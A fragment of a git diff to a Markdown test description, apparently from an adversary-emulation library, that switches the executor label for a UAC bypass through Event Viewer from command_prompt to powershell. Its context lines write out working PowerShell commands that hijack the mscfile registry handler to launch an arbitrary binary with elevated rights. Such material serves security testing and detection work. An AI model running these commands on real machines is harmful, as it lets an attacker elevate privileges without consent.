@@ -53,7 +53,7 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
|
||||
|------|-------------|------|---------------|
|
||||
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
|
||||
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
|
||||
|
||||
Reference in New Issue
Block a user